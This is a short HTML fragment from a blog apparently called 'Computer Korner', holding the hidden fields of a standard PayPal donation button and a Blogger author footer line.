<input name="cmd" type="hidden" value="_donations" /> <input name="business" type="hidden" value="ssutradhar35@gmail.com" /> <input name="lc" type="hidden" value="IN" /> <input name="item_name" type="hidden" value="Computer Korner" /> <input name="no_note" type="hidden" value="0" /> <input name="currency_code" type="hidden" value="USD" /> <input name="bn" type="hidden" value="PP-DonationsBF:btn_donateCC_LG.gif:NonHostedGuest" /> <input alt="PayPal — The safer, easier way to pay online." border="0" name="submit" src="https://www.paypalobjects.com/en_GB/i/btn/btn_donateCC_LG.gif" type="image" /> <img alt="" border="0" height="1" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="1" /> </form>
</center>
</div>
Jitendrahttp://www.blogger.com/profile/12006899852837970196noreply@blogger.com0